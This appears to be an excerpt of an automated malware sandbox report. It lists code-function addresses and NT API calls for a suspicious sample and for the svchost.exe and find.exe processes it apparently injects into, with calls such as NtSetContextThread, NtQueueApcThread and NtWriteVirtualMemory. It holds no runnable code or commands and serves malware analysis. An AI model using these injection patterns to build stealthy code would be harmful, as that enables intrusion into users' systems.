Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03273D70 NtOpenThread,	2_2_03273D70
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038E4340 NtSetContextThread,LdrInitializeThunk,	4_2_038E4340
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038E4650 NtSuspendThread,LdrInitializeThunk,	4_2_038E4650
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038E2BA0 NtEnumerateValueKey,LdrInitializeThunk,	4_2_038E2BA0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038E2BE0 NtQueryValueKey,LdrInitializeThunk,	4_2_038E2BE0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038E2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	4_2_038E2BF0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038E2B60 NtClose,LdrInitializeThunk,	4_2_038E2B60
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038E2AD0 NtReadFile,LdrInitializeThunk,	4_2_038E2AD0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038E2AF0 NtWriteFile,LdrInitializeThunk,	4_2_038E2AF0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038E2FB0 NtResumeThread,LdrInitializeThunk,	4_2_038E2FB0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038E2FE0 NtCreateFile,LdrInitializeThunk,	4_2_038E2FE0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038E2F30 NtCreateSection,LdrInitializeThunk,	4_2_038E2F30
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038E2E80 NtReadVirtualMemory,LdrInitializeThunk,	4_2_038E2E80
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038E2EE0 NtQueueApcThread,LdrInitializeThunk,	4_2_038E2EE0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038E2DD0 NtDelayExecution,LdrInitializeThunk,	4_2_038E2DD0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038E2DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_038E2DF0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038E2D10 NtMapViewOfSection,LdrInitializeThunk,	4_2_038E2D10
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038E2D30 NtUnmapViewOfSection,LdrInitializeThunk,	4_2_038E2D30
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038E2CA0 NtQueryInformationToken,LdrInitializeThunk,	4_2_038E2CA0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038E2C60 NtCreateKey,LdrInitializeThunk,	4_2_038E2C60
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038E2C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_038E2C70
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038E35C0 NtCreateMutant,LdrInitializeThunk,	4_2_038E35C0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038E39B0 NtGetContextThread,LdrInitializeThunk,	4_2_038E39B0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038E2B80 NtQueryInformationFile,	4_2_038E2B80
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038E2AB0 NtWaitForSingleObject,	4_2_038E2AB0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038E2F90 NtProtectVirtualMemory,	4_2_038E2F90
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038E2FA0 NtQuerySection,	4_2_038E2FA0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038E2F60 NtCreateProcessEx,	4_2_038E2F60
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038E2EA0 NtAdjustPrivilegesToken,	4_2_038E2EA0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038E2E30 NtWriteVirtualMemory,	4_2_038E2E30
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038E2DB0 NtEnumerateKey,	4_2_038E2DB0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038E2D00 NtSetInformationFile,	4_2_038E2D00
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038E2CC0 NtQueryVirtualMemory,	4_2_038E2CC0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038E2CF0 NtOpenProcess,	4_2_038E2CF0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038E2C00 NtQueryInformationProcess,	4_2_038E2C00
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038E3090 NtSetValueKey,	4_2_038E3090
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038E3010 NtOpenDirectoryObject,	4_2_038E3010
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038E3D10 NtOpenProcessToken,	4_2_038E3D10
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038E3D70 NtOpenThread,	4_2_038E3D70
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0360F0A7 NtQueryInformationProcess,	4_2_0360F0A7

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe

Code function: 0_2_00266606: CreateFileW,DeviceIoControl,CloseHandle,

0_2_00266606

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe

Code function: 0_2_0025ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_0025ACC5

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe

Code function: 0_2_002679D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_002679D3

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_0024B043	0_2_0024B043
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_00233200	0_2_00233200
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_00233B70	0_2_00233B70
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_0025410F	0_2_0025410F
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_002402A4	0_2_002402A4
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_0022E3B0	0_2_0022E3B0
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_0025038E	0_2_0025038E
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_0025467F	0_2_0025467F
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_002406D9	0_2_002406D9
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_0028AACE	0_2_0028AACE
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_00254BEF	0_2_00254BEF
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_0024CCC1	0_2_0024CCC1
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_00226F07	0_2_00226F07
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_0022AF50	0_2_0022AF50
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_0023B11F	0_2_0023B11F
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_002831BC	0_2_002831BC
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_0024D1B9	0_2_0024D1B9
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_0024123A	0_2_0024123A
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_0025724D	0_2_0025724D
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_002293F0	0_2_002293F0
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_002613CA	0_2_002613CA
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_0023F563	0_2_0023F563
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_002296C0	0_2_002296C0
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_0026B6CC	0_2_0026B6CC
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_002277B0	0_2_002277B0
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_0028F7FF	0_2_0028F7FF
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_002579C9	0_2_002579C9
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_0023FA57	0_2_0023FA57
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_00229B60	0_2_00229B60
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_00227D19	0_2_00227D19
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_0023FE6F	0_2_0023FE6F
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_00249ED0	0_2_00249ED0
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_00227FA3	0_2_00227FA3
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_018781C0	0_2_018781C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418903	2_2_00418903
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004029D0	2_2_004029D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00410213	2_2_00410213
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403215	2_2_00403215
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403220	2_2_00403220
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416B53	2_2_00416B53
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00410433	2_2_00410433
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E4B3	2_2_0040E4B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402D81	2_2_00402D81
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402D90	2_2_00402D90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040264D	2_2_0040264D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402650	2_2_00402650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042EE03	2_2_0042EE03
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FA352	2_2_032FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E3F0	2_2_0324E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033003E6	2_2_033003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C02C0	2_2_032C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230100	2_2_03230100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DA118	2_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C8158	2_2_032C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F41A2	2_2_032F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033001AA	2_2_033001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F81CC	2_2_032F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03264750	2_2_03264750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323C7C0	2_2_0323C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325C6E0	2_2_0325C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240535	2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03300591	2_2_03300591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E4420	2_2_032E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F2446	2_2_032F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EE4F6	2_2_032EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FAB40	2_2_032FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F6BD7	2_2_032F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03256962	2_2_03256962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0330A9A6	2_2_0330A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324A840	2_2_0324A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03242840	2_2_03242840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032268B8	2_2_032268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E8F0	2_2_0326E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03282F28	2_2_03282F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03260F30	2_2_03260F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E2F30	2_2_032E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B4F40	2_2_032B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BEFA0	2_2_032BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324CFE0	2_2_0324CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03232FC8	2_2_03232FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FEE26	2_2_032FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240E59	2_2_03240E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252E90	2_2_03252E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FCE93	2_2_032FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FEEDB	2_2_032FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324AD00	2_2_0324AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DCD1F	2_2_032DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03258DBF	2_2_03258DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323ADE0	2_2_0323ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240C00	2_2_03240C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0CB5	2_2_032E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230CF2	2_2_03230CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F132D	2_2_032F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322D34C	2_2_0322D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0328739A	2_2_0328739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032452A0	2_2_032452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E12ED	2_2_032E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325B2C0	2_2_0325B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0327516C	2_2_0327516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322F172	2_2_0322F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0330B16B	2_2_0330B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324B1B0	2_2_0324B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F70E9	2_2_032F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FF0E0	2_2_032FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EF0CC	2_2_032EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032470C0	2_2_032470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FF7B0	2_2_032FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03285630	2_2_03285630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F16CC	2_2_032F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F7571	2_2_032F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DD5B0	2_2_032DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033095C3	2_2_033095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FF43F	2_2_032FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03231460	2_2_03231460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FFB76	2_2_032FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325FB80	2_2_0325FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B5BF0	2_2_032B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0327DBF9	2_2_0327DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B3A6C	2_2_032B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FFA49	2_2_032FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F7A46	2_2_032F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DDAAC	2_2_032DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03285AA0	2_2_03285AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E1AA3	2_2_032E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EDAC6	2_2_032EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D5910	2_2_032D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03249950	2_2_03249950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325B950	2_2_0325B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AD800	2_2_032AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032438E0	2_2_032438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FFF09	2_2_032FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FFFB1	2_2_032FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03241F92	2_2_03241F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03203FD2	2_2_03203FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03203FD5	2_2_03203FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03249EB0	2_2_03249EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F7D73	2_2_032F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03243D40	2_2_03243D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F1D5A	2_2_032F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325FDC0	2_2_0325FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B9C32	2_2_032B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FFCF2	2_2_032FFCF2
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	Code function: 3_2_02EA4121	3_2_02EA4121
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	Code function: 3_2_02E8BE71	3_2_02E8BE71
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	Code function: 3_2_02E837D1	3_2_02E837D1
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	Code function: 3_2_02E85751	3_2_02E85751
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	Code function: 3_2_02E85531	3_2_02E85531
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_039703E6	4_2_039703E6
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038BE3F0	4_2_038BE3F0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0396A352	4_2_0396A352
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_039302C0	4_2_039302C0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03950274	4_2_03950274
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_039641A2	4_2_039641A2
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_039701AA	4_2_039701AA
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_039681CC	4_2_039681CC
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038A0100	4_2_038A0100
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0394A118	4_2_0394A118
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03938158	4_2_03938158
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03942000	4_2_03942000
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038AC7C0	4_2_038AC7C0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038D4750	4_2_038D4750
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038B0770	4_2_038B0770
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038CC6E0	4_2_038CC6E0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03970591	4_2_03970591
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038B0535	4_2_038B0535
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0395E4F6	4_2_0395E4F6
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03954420	4_2_03954420
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03962446	4_2_03962446
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03966BD7	4_2_03966BD7
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0396AB40	4_2_0396AB40
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038AEA80	4_2_038AEA80
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038B29A0	4_2_038B29A0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0397A9A6	4_2_0397A9A6
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038C6962	4_2_038C6962
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038968B8	4_2_038968B8
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038DE8F0	4_2_038DE8F0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038BA840	4_2_038BA840
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038B2840	4_2_038B2840
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0392EFA0	4_2_0392EFA0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038A2FC8	4_2_038A2FC8
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038BCFE0	4_2_038BCFE0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03952F30	4_2_03952F30
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038F2F28	4_2_038F2F28
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038D0F30	4_2_038D0F30
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03924F40	4_2_03924F40
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0396CE93	4_2_0396CE93
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038C2E90	4_2_038C2E90
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0396EEDB	4_2_0396EEDB
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0396EE26	4_2_0396EE26
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038B0E59	4_2_038B0E59
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038C8DBF	4_2_038C8DBF
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038AADE0	4_2_038AADE0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038BAD00	4_2_038BAD00
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0394CD1F	4_2_0394CD1F
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03950CB5	4_2_03950CB5
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038A0CF2	4_2_038A0CF2
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038B0C00	4_2_038B0C00
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038F739A	4_2_038F739A
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0396132D	4_2_0396132D
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0389D34C	4_2_0389D34C
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038B52A0	4_2_038B52A0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038CB2C0	4_2_038CB2C0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_039512ED	4_2_039512ED
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038BB1B0	4_2_038BB1B0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038E516C	4_2_038E516C
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0389F172	4_2_0389F172
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0397B16B	4_2_0397B16B
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038B70C0	4_2_038B70C0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0395F0CC	4_2_0395F0CC
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0396F0E0	4_2_0396F0E0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_039670E9	4_2_039670E9
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0396F7B0	4_2_0396F7B0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_039616CC	4_2_039616CC
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038F5630	4_2_038F5630
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0394D5B0	4_2_0394D5B0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_039795C3	4_2_039795C3
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03967571	4_2_03967571
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0396F43F	4_2_0396F43F
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038A1460	4_2_038A1460
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038CFB80	4_2_038CFB80
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03925BF0	4_2_03925BF0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038EDBF9	4_2_038EDBF9
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0396FB76	4_2_0396FB76
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038F5AA0	4_2_038F5AA0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03951AA3	4_2_03951AA3
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0394DAAC	4_2_0394DAAC
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0395DAC6	4_2_0395DAC6
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03967A46	4_2_03967A46
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0396FA49	4_2_0396FA49
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03923A6C	4_2_03923A6C
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03945910	4_2_03945910
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038B9950	4_2_038B9950
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038CB950	4_2_038CB950
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038B38E0	4_2_038B38E0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0391D800	4_2_0391D800
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038B1F92	4_2_038B1F92
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0396FFB1	4_2_0396FFB1
